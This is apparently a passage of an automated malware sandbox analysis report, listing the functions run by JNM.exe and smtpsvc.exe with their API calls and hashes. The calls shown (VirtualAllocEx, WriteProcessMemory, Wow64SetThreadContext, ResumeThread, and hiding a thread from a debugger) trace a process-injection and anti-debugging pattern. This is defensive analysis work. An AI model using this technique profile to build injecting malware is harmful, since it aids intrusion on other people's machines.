              • Source File: 00000007.00000002.2355873945.000000000028D000.00000040.00000001.sdmp, Offset: 0028D000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
              • Instruction ID: 9c5d8b72084a240e6c844feeaed695defc76e9c6cf6031ca4d85c7b3cb6a03e3
              • Opcode Fuzzy Hash: 53477353790cdefaedfc221285acf2dbb3c11961671178482a9ce8496e36c9d6
              • Instruction Fuzzy Hash: 2D11BB79508280CFDB11CF10D584B15BBA1FB84314F28C6AAD8094B696C33AD81BCBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: JNM.exe PID: 2360 Parent PID: 2464 JNM.exeCOMMON

              Executed Functions

              Function 00458DE5, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64nativethreadCOMMON
              Download Yara Rule
              APIs
              • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,00458D77,00000000,00000000), ref: 00458EC8
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: InformationThread
              • String ID: @SF
              • API String ID: 4046476035-2455508565
              • Opcode ID: f685cb176f162280a43551a057a4930561da080ecf0104acc80665c089fa3277
              • Instruction ID: 639705bd2d96d81d406520505a321d7ea17fde735866b4ae4c3c0e6846f70e25
              • Opcode Fuzzy Hash: f685cb176f162280a43551a057a4930561da080ecf0104acc80665c089fa3277
              • Instruction Fuzzy Hash: EC218670904208DFDB00DFE9C489BDEBBF0AF48314F60845AD954AB212C7789645CF95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00450AC4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53nativethreadCOMMON
              Download Yara Rule
              APIs
              • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,00458D77,00000000,00000000), ref: 00458EC8
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: InformationThread
              • String ID: @SF
              • API String ID: 4046476035-2455508565
              • Opcode ID: 1801ae989a0f3e02b24d6d6e155559c3652d97b2d693b3e8095a3af27f472100
              • Instruction ID: 87cee03a91ee31dc96c5c509b8e2258195c9f055f303ed93c6a538f4fcb7aa6f
              • Opcode Fuzzy Hash: 1801ae989a0f3e02b24d6d6e155559c3652d97b2d693b3e8095a3af27f472100
              • Instruction Fuzzy Hash: F011F6759002099FCB10DF99D449BDFBBF5EB88314F24881AE959B7210C774A944CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00480068, Relevance: 6.3, Strings: 5, Instructions: 60COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356218621.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
              Similarity
              • API ID:
              • String ID: fCl$fCl$fCl$fCl$fCl
              • API String ID: 0-2453322616
              • Opcode ID: 63c8613727ccb65c5d369a3b0a691eae6a9f0b53db644bb15f16b4cf326c6d74
              • Instruction ID: c09ba61337fc14e00744307ae6f6664cb70117dfb5dadc07e9be756a05389803
              • Opcode Fuzzy Hash: 63c8613727ccb65c5d369a3b0a691eae6a9f0b53db644bb15f16b4cf326c6d74
              • Instruction Fuzzy Hash: 960180313402241BE658B239AD57F3F22DFE7C5A90F108539AA1AAF3C5CFA89D4113A5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045A450, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0045A68E
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: CreateProcess
              • String ID: @SF$@SF
              • API String ID: 963392458-3794518052
              • Opcode ID: dfb87217037fc10b62b992c6794cdcbf84e3754231e57b6c7e806ee67b3f3044
              • Instruction ID: bb65f04d9c5833ea6c2bedec28c94b1fa24af6917c129cefcbf44f5aec830450
              • Opcode Fuzzy Hash: dfb87217037fc10b62b992c6794cdcbf84e3754231e57b6c7e806ee67b3f3044
              • Instruction Fuzzy Hash: 28A16C71D00219DFDF14CFA4C841BEEBBB2BF48305F14866AD809A7241D7789999CF96
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045A458, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0045A68E
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: CreateProcess
              • String ID: @SF$@SF
              • API String ID: 963392458-3794518052
              • Opcode ID: 6a8ed0b10173d11b8ac3800764ff5f2d30531fc5bbd4bc52afcf4104cef24fad
              • Instruction ID: 437cdf7a7acaefb4165db3d3ca1d81d4bd7ebca725740ff23c0735cb6105e477
              • Opcode Fuzzy Hash: 6a8ed0b10173d11b8ac3800764ff5f2d30531fc5bbd4bc52afcf4104cef24fad
              • Instruction Fuzzy Hash: 90917C71D00219DFDF14CFA4C841BDEBBB2BF48305F14866AE809A7241DB789999CF96
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045B44E, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
              Download Yara Rule
              APIs
              • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 0045B6C6
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: KernelObjectSecurity
              • String ID: @SF
              • API String ID: 3015937269-2455508565
              • Opcode ID: 3e383fbccbdbb75e58170a944c5bd6bda3a196105a2f600af8103921c64584ff
              • Instruction ID: 7352e4b067fdbac9b12daa2ed17c2683495b02ff702aca6e9d90f48bcb03a875
              • Opcode Fuzzy Hash: 3e383fbccbdbb75e58170a944c5bd6bda3a196105a2f600af8103921c64584ff
              • Instruction Fuzzy Hash: C461FFB1D002489FCB14CFB9C8547DEBBB1EF89315F10856AE814AB392D7389945CFA6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045A1D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
              Download Yara Rule
              APIs
              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0045A260
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: MemoryProcessWrite
              • String ID: @SF
              • API String ID: 3559483778-2455508565
              • Opcode ID: b5095b3b2df2ec087f9a2b24b12555ee7b58c4cf1e94bd1a056780a52819cf45
              • Instruction ID: 4845fcfa458f1d818caa635da54c760b9bdef163a663d843d348f57d35bbd533
              • Opcode Fuzzy Hash: b5095b3b2df2ec087f9a2b24b12555ee7b58c4cf1e94bd1a056780a52819cf45
              • Instruction Fuzzy Hash: 952146719003099FCB10CFA9C8847DEBBF5FF48314F10882AE919A7340C778A954CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045A030, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64threadCOMMON
              Download Yara Rule
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0045A0B6
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: ContextThreadWow64
              • String ID: @SF
              • API String ID: 983334009-2455508565
              • Opcode ID: b11f4502e880d675c03b14b1a766cdc0cd12f91541e02e98fedf3196bd5746fa
              • Instruction ID: 33ed8e3d9ee0b685f26caa48672567776c96435bf1b6391f75da2da1ad248575
              • Opcode Fuzzy Hash: b11f4502e880d675c03b14b1a766cdc0cd12f91541e02e98fedf3196bd5746fa
              • Instruction Fuzzy Hash: 1A216A71D002098FDB10CFA9C4847EEBBF5AF49314F64882ED959A7340C7789949CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045B640, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
              Download Yara Rule
              APIs
              • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 0045B6C6
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: KernelObjectSecurity
              • String ID: @SF
              • API String ID: 3015937269-2455508565
              • Opcode ID: 075726682a949a81dd71cbb1c3a84d9f05e886d796eca8e372b9ba277f6dc1bc
              • Instruction ID: 82e8ea67c810335b8832a674bc60070820b4977d705001f48675bec6b3cc379d
              • Opcode Fuzzy Hash: 075726682a949a81dd71cbb1c3a84d9f05e886d796eca8e372b9ba277f6dc1bc
              • Instruction Fuzzy Hash: 48213AB19002498FCB10CFA9D484BEEBBF4EF89314F14842ED859A7341D778A944CFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045A038, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
              Download Yara Rule
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0045A0B6
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: ContextThreadWow64
              • String ID: @SF
              • API String ID: 983334009-2455508565
              • Opcode ID: ab8264c126da631bf5ef65c5ed476dbb49393e92eb346903444656ef87ce76b1
              • Instruction ID: 960b52dbe30bf2cbc3163eb5b297dfe50a8172ceda7752a536c5984d935826d2
              • Opcode Fuzzy Hash: ab8264c126da631bf5ef65c5ed476dbb49393e92eb346903444656ef87ce76b1
              • Instruction Fuzzy Hash: 36213871D002098FCB10CFAAC4847EEBBF5EF48314F54882AD959A7340D778A948CFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045A2C0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0045A340
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: MemoryProcessRead
              • String ID: @SF
              • API String ID: 1726664587-2455508565
              • Opcode ID: 711c4d2b7360982572dce3fb61cedb2f629a1e51c2f2db24c83d35963e0f745f
              • Instruction ID: 1f4a340e2234142a23ec63623725741cb1fe029a7fc2c5902d952a4c5fc9d2f9
              • Opcode Fuzzy Hash: 711c4d2b7360982572dce3fb61cedb2f629a1e51c2f2db24c83d35963e0f745f
              • Instruction Fuzzy Hash: 1E212871D002099FCB10CFA9C8446EEFBF5FF48314F54882AE959A7240D778A954CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045B648, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
              Download Yara Rule
              APIs
              • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 0045B6C6
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: KernelObjectSecurity
              • String ID: @SF
              • API String ID: 3015937269-2455508565
              • Opcode ID: c077c0cb968e4d0bf2d4efaef613fadf0df32d5162573c1862225b1e3f8175dc
              • Instruction ID: 28f7a5c477fdb9d4ae9be12ede198c5abfe370d00ab56a623eea216f07be800a
              • Opcode Fuzzy Hash: c077c0cb968e4d0bf2d4efaef613fadf0df32d5162573c1862225b1e3f8175dc
              • Instruction Fuzzy Hash: A12127B1900209DFCB10CF9AC484BEEBBF4EF88314F14842AE819A7341D778A944CFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045A10A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0045A17E
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: AllocVirtual
              • String ID: @SF
              • API String ID: 4275171209-2455508565
              • Opcode ID: 75a762e1b639c5a387272e0297fae869841fc250802aff49819341c9636cbfb5
              • Instruction ID: f068be0271b03690d78dabefd7d672ef10658fa09f536586b8d58a49f7f09d9d
              • Opcode Fuzzy Hash: 75a762e1b639c5a387272e0297fae869841fc250802aff49819341c9636cbfb5
              • Instruction Fuzzy Hash: FE1144769002098FCB10CFA9C8447EFBBF5AF88314F24881AE959A7240C779A954CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045A110, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0045A17E
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: AllocVirtual
              • String ID: @SF
              • API String ID: 4275171209-2455508565
              • Opcode ID: b33353ea35773625331b3f6f8aad49e1ba7690ed68c84edba2b474acede44466
              • Instruction ID: 6a853e35452cc71c4f704f998b8658da2b7c20dddd666ed5a816c2979a50efed
              • Opcode Fuzzy Hash: b33353ea35773625331b3f6f8aad49e1ba7690ed68c84edba2b474acede44466
              • Instruction Fuzzy Hash: A51137719002099FCB10CFA9D8447DFBBF5AF88314F14881AE919A7250C779A954CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045A818, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: ResumeThread
              • String ID: @SF
              • API String ID: 947044025-2455508565
              • Opcode ID: b15642818a651904544a001238fd95ed6f6d19324b0a39a62a8da3a4cf441601
              • Instruction ID: aa6e136447444efcb1704a86154a516a8d18479dfc72750ddcb7b81f6edf7566
              • Opcode Fuzzy Hash: b15642818a651904544a001238fd95ed6f6d19324b0a39a62a8da3a4cf441601
              • Instruction Fuzzy Hash: 901136B1D003098FCB10DFAAD4447EFFBF9AF88314F24881AD519A7240C778A944CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045B718, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
              Download Yara Rule
              APIs
              • KiUserExceptionDispatcher.NTDLL ref: 0045B797
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: DispatcherExceptionUser
              • String ID:
              • API String ID: 6842923-0
              • Opcode ID: a47efb350b4978a27a8b81be11c2f5298239319f9850e84274daa7f9c8ccabfc
              • Instruction ID: 2d0a1d5e35f923d01cf9a66de017379c4512c9e374007db8a8ed67ea3d0582e1
              • Opcode Fuzzy Hash: a47efb350b4978a27a8b81be11c2f5298239319f9850e84274daa7f9c8ccabfc
              • Instruction Fuzzy Hash: CAA11070D001098FDB14CFA9D984BDDBBF2FF8435AF188019D411AB796D7799889CB68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0045B707, Relevance: 1.7, APIs: 1, Instructions: 156COMMON
              Download Yara Rule
              APIs
              • KiUserExceptionDispatcher.NTDLL ref: 0045B797
              Memory Dump Source
              • Source File: 0000000F.00000002.2356185958.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
              Similarity
              • API ID: DispatcherExceptionUser
              • String ID:
              • API String ID: 6842923-0
              • Opcode ID: 8bc50d5e6fcac359dfcd15a28ae58f34894e98256091fe584d560cb84a22b8ce
              • Instruction ID: 97fbe3a2645c81dd5f5c7f850d8faeb7ebec29208af8162bf94e5c00078f0258
              • Opcode Fuzzy Hash: 8bc50d5e6fcac359dfcd15a28ae58f34894e98256091fe584d560cb84a22b8ce
              • Instruction Fuzzy Hash: E9614D70D00149CFDB04CFA9D884ADDBBB2FF8931AF14811AD401AB796D7399889CF68
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: smtpsvc.exe PID: 3012 Parent PID: 2464 smtpsvc.exeCOMMON

              Executed Functions

              Function 003B0AC4, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
              Download Yara Rule
              APIs
              • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,003B8D77,00000000,00000000), ref: 003B8EC8
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: InformationThread
              • String ID:
              • API String ID: 4046476035-0
              • Opcode ID: e372af2567b77f6082c0913158bb7f6ffcd2ed5550ffacca982ccaa260d674e2
              • Instruction ID: 6a87cd7b247df33623c687a3560a0909765ca1c2c637d0e4eb6421fd3e8c98c5
              • Opcode Fuzzy Hash: e372af2567b77f6082c0913158bb7f6ffcd2ed5550ffacca982ccaa260d674e2
              • Instruction Fuzzy Hash: 4B1104B5900209DFCB10DF99D848BDFFBF9EB89314F24881AE558A7610C774A944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003B8E03, Relevance: 1.5, APIs: 1, Instructions: 47nativethreadCOMMON
              Download Yara Rule
              APIs
              • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,003B8D77,00000000,00000000), ref: 003B8EC8
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: InformationThread
              • String ID:
              • API String ID: 4046476035-0
              • Opcode ID: d9b9cec60f1e2dabd30483ddbe47ec57fd1f6ea1975d62e2d331145a4ac4c9a6
              • Instruction ID: 7e8fa221d7db0976e2b5184c7439ae7f70b62718008747377b2b996167cb4730
              • Opcode Fuzzy Hash: d9b9cec60f1e2dabd30483ddbe47ec57fd1f6ea1975d62e2d331145a4ac4c9a6
              • Instruction Fuzzy Hash: B1114875900209CFCB10CF99D444BDEFBF4BF88328F24891AD168A7660C7749544CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003E0001, Relevance: 6.4, Strings: 5, Instructions: 100COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000010.00000002.2165603070.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
              Similarity
              • API ID:
              • String ID: fCl$fCl$fCl$fCl$fCl
              • API String ID: 0-2453322616
              • Opcode ID: a0589487ef8b53397d56631437b2557fe04a246293a46ba5d7d08a23fca71b2c
              • Instruction ID: 7646c6add62b8bf3e5bfe682c94316600214ddc57b4dbff6a7a48e85dc1730eb
              • Opcode Fuzzy Hash: a0589487ef8b53397d56631437b2557fe04a246293a46ba5d7d08a23fca71b2c
              • Instruction Fuzzy Hash: F021EF2170D3D00FC356A2345C76B6ABFAA9BC3280F1985AFE485DF2D7CA984C459363
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003E0068, Relevance: 6.3, Strings: 5, Instructions: 60COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000010.00000002.2165603070.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
              Similarity
              • API ID:
              • String ID: fCl$fCl$fCl$fCl$fCl
              • API String ID: 0-2453322616
              • Opcode ID: 15b922a855933dac148fa1c785d1a6113a45d7e2f2e2e854883636c8a8e3de59
              • Instruction ID: 7922727cbff82034ec040803659306c2ea6f30d348fc6a71d7eb4b4fe5a181e5
              • Opcode Fuzzy Hash: 15b922a855933dac148fa1c785d1a6113a45d7e2f2e2e854883636c8a8e3de59
              • Instruction Fuzzy Hash: 6001A13134011417D658B678AD57B7FA2DFD7C6690F108529B60AEF3C6CEA49D4113A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BA44C, Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003BA68E
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 2b3f793d18372b73da0990fb8fbb1d1d95b9fa113707d518a4ca8a02955a9813
              • Instruction ID: c5e9645e6d730b91b05cb659d93996d8b361c9cc32c71c7d1068307bcdc41a77
              • Opcode Fuzzy Hash: 2b3f793d18372b73da0990fb8fbb1d1d95b9fa113707d518a4ca8a02955a9813
              • Instruction Fuzzy Hash: BEA19E71D00A19CFDF25CFA8C841BEDBBB2BF45308F15856AD948A7240DB749A85CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BA458, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003BA68E
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: c495bd1d8e87a81e75f9ba2d2763d69afb76d311460dad50481d93ee48a8de8c
              • Instruction ID: 8ec5f0a5884716ef894ac398cfea7d2b3148099e2b5aae03a66c478394fb8117
              • Opcode Fuzzy Hash: c495bd1d8e87a81e75f9ba2d2763d69afb76d311460dad50481d93ee48a8de8c
              • Instruction Fuzzy Hash: D9918C71D00A19CFDF25CFA8C841BDDBBB2BF49308F15856AD948A7240DB749A85CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BA1D0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
              Download Yara Rule
              APIs
              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 003BA260
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: e22ead612e1c2ecdbdd1fa9c8124373c707e762dd42a3afbe8c5988c95338f53
              • Instruction ID: 0941164056f5baddc33e56dce17a26eed50048e8f7fe0b1762e48f8a64508334
              • Opcode Fuzzy Hash: e22ead612e1c2ecdbdd1fa9c8124373c707e762dd42a3afbe8c5988c95338f53
              • Instruction Fuzzy Hash: 49212675D007099FCB10CFA9D8847DEBBF5FF48314F10882AE959A7240D7789954CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BA030, Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
              Download Yara Rule
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 003BA0B6
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: 492593dd57ab64928a67fc0e1b3607ab9e34b8494f7000c67322b00dc31832ed
              • Instruction ID: b713fa65dd3122d190f52dd240f31f820cc27b8a9eeb86376f4116a8a6f6f33c
              • Opcode Fuzzy Hash: 492593dd57ab64928a67fc0e1b3607ab9e34b8494f7000c67322b00dc31832ed
              • Instruction Fuzzy Hash: 85216871D006098FDB10DFA9C4847EEBBF5EF88328F54882ED559A7240C7789944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BA038, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
              Download Yara Rule
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 003BA0B6
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: e413d0a325bd5a17d0d0e3b294b91ea6b090910ccc3e53d5916bcbbc2fc7bc04
              • Instruction ID: b3e4a3efed557ce857ca353c8060ca7686b2fab319690769a3a61081c299a59e
              • Opcode Fuzzy Hash: e413d0a325bd5a17d0d0e3b294b91ea6b090910ccc3e53d5916bcbbc2fc7bc04
              • Instruction Fuzzy Hash: 49213571D006098FCB10DFAAC4847EEBBF5EF89318F54882AD559A7240D778AA44CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BA2C0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 003BA340
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: 42a7fdbc25855ac706b3b685cf388537ad16bcb2c91853e5cf3dd9c2914a180f
              • Instruction ID: dcfa949ac8a676151ef31c8f81535a8f9e7cfd20d7f85b7ab3f62957827cd5af
              • Opcode Fuzzy Hash: 42a7fdbc25855ac706b3b685cf388537ad16bcb2c91853e5cf3dd9c2914a180f
              • Instruction Fuzzy Hash: DE212871D006099FCB10CFA9D8846EEFBF5FF48314F54882AE559A7240D7749944CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BB648, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
              Download Yara Rule
              APIs
              • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 003BB6C6
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: KernelObjectSecurity
              • String ID:
              • API String ID: 3015937269-0
              • Opcode ID: 91031c776a9c780f70aa644b611692e0807895b1af8600f894b026f536914684
              • Instruction ID: c66cb9cfb5d53e5f16093840378fb0d0bfdacb2e433853186fd9b29cfece87ef
              • Opcode Fuzzy Hash: 91031c776a9c780f70aa644b611692e0807895b1af8600f894b026f536914684
              • Instruction Fuzzy Hash: 772104B19002099FCB14CF9AD484BEEFBF4EF89354F14842AE518A7640D778A944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BC020, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualProtect.KERNEL32(?,?,?,?), ref: 003BC09B
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: ProtectVirtual
              • String ID:
              • API String ID: 544645111-0
              • Opcode ID: bf006c34cdb66f201c5e8b024440d9163375a70efae90d3fb9bbc3efefa6eb7a
              • Instruction ID: 7053739298cc5b28c9127408c6465a711e3765c89781b88919e74c26e6c34baa
              • Opcode Fuzzy Hash: bf006c34cdb66f201c5e8b024440d9163375a70efae90d3fb9bbc3efefa6eb7a
              • Instruction Fuzzy Hash: 0521E3B59002499FCB10DFAAD484BDEFBF4AB89314F14892AE859A7250C374A944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BC028, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualProtect.KERNEL32(?,?,?,?), ref: 003BC09B
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: ProtectVirtual
              • String ID:
              • API String ID: 544645111-0
              • Opcode ID: ec10808ae00e2777718f77d9c5baa115c489b6315d0fcf3ddf610dc72f90f807
              • Instruction ID: 8606047d917c7f9fbaf6a7079ab626359376fbd8f933cd7cbe1a266dd78d7fda
              • Opcode Fuzzy Hash: ec10808ae00e2777718f77d9c5baa115c489b6315d0fcf3ddf610dc72f90f807
              • Instruction Fuzzy Hash: 7011D3B5900209DFCB10DF9AD484BDEFBF4BB89314F14882AE958A7210C374A944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BA10A, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 003BA17E
              Memory Dump Source
              • Source File: 00000010.00000002.2165523060.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 8c3ab8460bd28cb9b48cd1baa2a538faed305243a0bdeb4f21c70fc1c79953ef
              • Instruction ID: 98ac8977505102b6874cc8dada0ce82b1ab44ff726240e70ee051a45270248b3
              • Opcode Fuzzy Hash: 8c3ab8460bd28cb9b48cd1baa2a538faed305243a0bdeb4f21c70fc1c79953ef
              • Instruction Fuzzy Hash: B6115675D006099FCB10CFA9D844BEEBBF5AF88318F24881AE519A7250C7799944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 003BA110, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
              Download Yara Rule
              APIs
              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 003BA17E
              Memory Dump Source
